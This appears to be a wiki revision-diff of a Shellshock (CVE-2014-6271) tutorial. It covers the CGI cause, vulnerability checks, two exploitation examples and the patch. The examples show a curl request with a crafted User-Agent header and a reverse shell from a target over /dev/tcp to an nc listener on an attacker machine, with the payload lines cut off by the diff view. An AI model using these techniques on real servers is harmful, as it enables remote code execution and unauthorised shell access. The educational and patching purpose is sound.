bash:shellshock
Differences
This shows you the differences between two versions of the page.
| Next revision | Previous revision | ||
| bash:shellshock [2016/07/03 17:36] – created peter | bash:shellshock [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== | + | ====== |
| The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash. | The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash. | ||
| Line 7: | Line 7: | ||
| The Bash flaw – designated CVE-2014-6271 [http:// | The Bash flaw – designated CVE-2014-6271 [http:// | ||
| - | Main Reason: | + | ---- |
| + | |||
| + | ===== Main Reason | ||
| The issue starts with **mod_cgi** and how web servers interact with CGI programs (that could be written in Perl, PHP, Shell scripting or any other language). | The issue starts with **mod_cgi** and how web servers interact with CGI programs (that could be written in Perl, PHP, Shell scripting or any other language). | ||
| Line 17: | Line 19: | ||
| Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way. We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities. | Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way. We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities. | ||
| + | ---- | ||
| - | Finding the Bug in your server: | + | ===== Finding the Bug ===== |
| - | Finding if you’re vulnerable is easier than previous vulnerabilities. | + | Finding if you’re vulnerable is easier than previous vulnerabilities. |
| <code bash> | <code bash> | ||
| Line 26: | Line 29: | ||
| </ | </ | ||
| + | or | ||
| + | |||
| + | <code bash> | ||
| + | env ' | ||
| + | </ | ||
| + | |||
| If you are vulnerable it will return: | If you are vulnerable it will return: | ||
| Line 38: | Line 47: | ||
| hello | hello | ||
| </ | </ | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ===== Remote Code Execution Through Bash ===== | ||
| + | |||
| + | ==== Example 1: Creating a file in the target system using Shellshock ==== | ||
| + | |||
| + | Below I explained with simple example of remote code execution through vulnerable bash. | ||
| + | |||
| + | I already have a working Apache web server with **mod_cgi** enabled and with a simple bash script to echo “CGI Bash Bug Example” and size of root filesystem. | ||
| + | |||
| + | <code bash> | ||
| + | cat / | ||
| + | </ | ||
| + | |||
| + | displays: | ||
| + | |||
| + | <file bash / | ||
| + | #!/bin/bash | ||
| + | echo “Content-type: | ||
| + | echo “” | ||
| + | echo “< | ||
| + | echo `df -h / | grep -v Filesystem` | ||
| + | </ | ||
| + | |||
| + | Test it: | ||
| + | |||
| + | < | ||
| + | # Delete the tmp file if is exists from a previous run. | ||
| + | rm -fr / | ||
| + | |||
| + | # Access the website, which runs the CGI script. | ||
| + | curl -k -H ‘User-Agent: | ||
| + | |||
| + | # Check the web server logs. | ||
| + | tail -n1 / | ||
| + | |||
| + | # Check the output. | ||
| + | ls -l / | ||
| + | </ | ||
| + | |||
| + | |||
| + | So you have a cgi file named “bashbug” that does nothing but respond with “CGI bug found”. | ||
| + | |||
| + | |||
| + | ---- | ||
| + | |||
| + | ==== Example 2: Getting a reverse tcp connection from target system using /dev/tcp connection. ==== | ||
| + | |||
| + | |||
| + | In this example I had two machines, one is Kali Linux – 192.168.31.20 | ||
| + | |||
| + | From my Kali Linux machine i executed the remote command on the target Ubuntu system to create a TCP connection on port 4444 and then listen on port 4444 in my local machine using netcat. | ||
| + | |||
| + | < | ||
| + | root@kali# nc -lvp 4444 | ||
| + | |||
| + | root@kali# | ||
| + | </ | ||
| + | |||
| + | That’s it we successfully got the reverse connection of www-data user from the bash vulnerable system. | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ===== Test Remote Sites ===== | ||
| + | |||
| + | If you simply want to test if websites or specific CGI scripts are vulnerable, use this link: | ||
| + | |||
| + | http:// | ||
| + | |||
| + | |||
| + | ---- | ||
| + | |||
| + | ===== Fix the Vulnerability ===== | ||
| + | |||
| + | The easiest way to fix the vulnerability is to use your default package manager to update the version of Bash. | ||
| + | |||
| + | <code bash> | ||
| + | sudo apt-get update && sudo apt-get install --only-upgrade bash | ||
| + | </ | ||
| + | |||
| + | ---- | ||
| + | |||
| + | ===== End of Life Ubuntu / Debian Releases ===== | ||
| + | |||
| + | If you are running a release of Ubuntu / Debian that is considered end of life status, you will have to upgrade to a supported to use the package manager to update Bash. The following command can be used to upgrade to a new release (it is recommended that you back up your server and important data first, in case you run into any issues): | ||
| + | |||
| + | <code bash> | ||
| + | sudo do-release-upgrade | ||
| + | </ | ||
| + | |||
| + | After the upgrade is complete, ensure that you update Bash. | ||
bash/shellshock.1467567398.txt.gz · Last modified: 2020/07/15 09:30 (external edit)